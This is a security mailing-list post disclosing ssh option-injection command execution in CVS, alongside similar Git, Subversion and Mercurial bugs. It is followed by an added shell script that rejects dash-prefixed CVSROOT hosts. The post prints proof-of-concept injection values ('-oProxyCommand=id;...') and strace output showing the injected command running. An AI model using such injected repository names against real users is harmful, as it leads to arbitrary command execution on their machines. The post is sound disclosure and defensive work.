
CVS and ssh command injection (see CVE-2017-1000117, etc.)

From: Hank Leininger
Subject: CVS and ssh command injection (see CVE-2017-1000117, etc.)
Date: Thu, 10 Aug 2017 22:19:26 -0600

Bugs in Git, Subversion, and Mercurial were just announced and patched
which allowed arbitrary local command execution if a malicious name was
used for the remote server, such as one starting with - to pass options to
the ssh client:

  git clone ssh://-oProxyCommand=some-command...

CVS has a similar problem with the -d option:

  $ strace -f -e execve cvs -d '-oProxyCommand=id;localhost:/bar' co yada 2>&1 | egrep [^pu]id
  execve("/usr/bin/cvs", ["cvs", "-d", "-oProxyCommand=id;localhost:/bar", "co", "yada"], 0x7ffe69f75a68 /* 139 vars */) = 0
  [pid 20003] execve("/usr/local/bin/ssh", ["ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x5fb1fc8420 /* 141 vars */ ) = -1 ENOENT (No such file or directory)
  [pid 20003] execve("/usr/bin/ssh", ["ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x5fb1fc8420 /* 141 vars */) = 0
  [pid 20004] execve("/bin/bash", ["/bin/bash", "-c", "exec id;localhost"], 0x32af5f10d0 /* 141 vars */) = 0
  [pid 20004] execve("/usr/bin/id", ["id"], 0xec92226ae0 /* 141 vars */) = 0
  ssh_exchange_identification: Connection closed by remote host

Tested vanilla CVS 1.12.13, and Gentoo CVS 1.12.12-r11.

Of course, the repo specification looks very odd, so tricking a victim
may be harder than for SCM tools where it's prefixed by an ssh://, or
masked behind a redirect, or submodule paths may be followed without
user interaction.

See also:




Hank Leininger <hlein@korelogic.com>
5F6D DCC8 FF53 8093 EC39  127B 091E 7F7C E898 E86C

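A pre-flight check for the problem described in the post above, added here as an example that is not part of the original message and not code from CVS itself. The strace shows the host portion of the `-d` argument being handed to ssh as its first argument, where a leading dash makes it an option; the check below extracts that host portion and refuses a CVSROOT whose host (with or without a `user@` prefix) starts with `-`. The CVSROOT forms handled (`host:/path` and `:ext:[user@]host:/path`) and the function names are assumptions of this example.

```shell
#!/bin/sh
# Added example, not code from the original post or from CVS itself:
# a pre-flight check that refuses a CVSROOT whose remote host component
# begins with '-', since that component ends up as an argument to ssh and
# is parsed there as an option (e.g. -oProxyCommand=...).
# The CVSROOT forms handled and the function names are assumptions:
#   host:/path                 ssh via CVS_RSH, no method prefix
#   :ext:[user@]host:/path     explicit :ext: method
# Other methods (:local:, :pserver:, ...) and plain local paths are
# treated as having no ssh host and are passed through.

# Print the host component of a CVSROOT on stdout; return 1 if the
# string has no ssh host component.
cvsroot_host() {
    root=$1
    case $root in
        :ext:*) rest=${root#:ext:} ;;
        :*)     return 1 ;;          # another access method, not ssh
        *:*)    rest=$root ;;
        *)      return 1 ;;          # local path, no host
    esac
    hostpart=${rest%%:*}             # drop ':/path'
    [ -n "$hostpart" ] || return 1
    printf '%s\n' "$hostpart"
}

# Return 0 if the CVSROOT is safe to hand to cvs -d, 1 if its host
# component (with or without a leading user@) starts with '-'.
check_cvsroot() {
    host=$(cvsroot_host "$1") || return 0   # nothing reaches ssh
    case $host in
        -*|*@-*)
            printf 'refusing CVSROOT %s: host "%s" parses as an ssh option\n' "$1" "$host" >&2
            return 1 ;;
    esac
    return 0
}

# Usage: sh cvsroot_check.sh "$CVSROOT"; exits non-zero on a rejected root.
if [ $# -gt 0 ]; then
    check_cvsroot "$1" && printf 'ok: %s\n' "$1"
fi
```

Run it on the value from the strace above (`-oProxyCommand=id;localhost:/bar`) and it is refused before cvs ever spawns ssh; a normal `cvs.example.org:/repo` or `:ext:alice@cvs.example.org:/repo` passes. Rejecting a leading dash in the host is the same shape of fix the other SCM tools needed; it does not depend on which ssh options happen to be dangerous.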
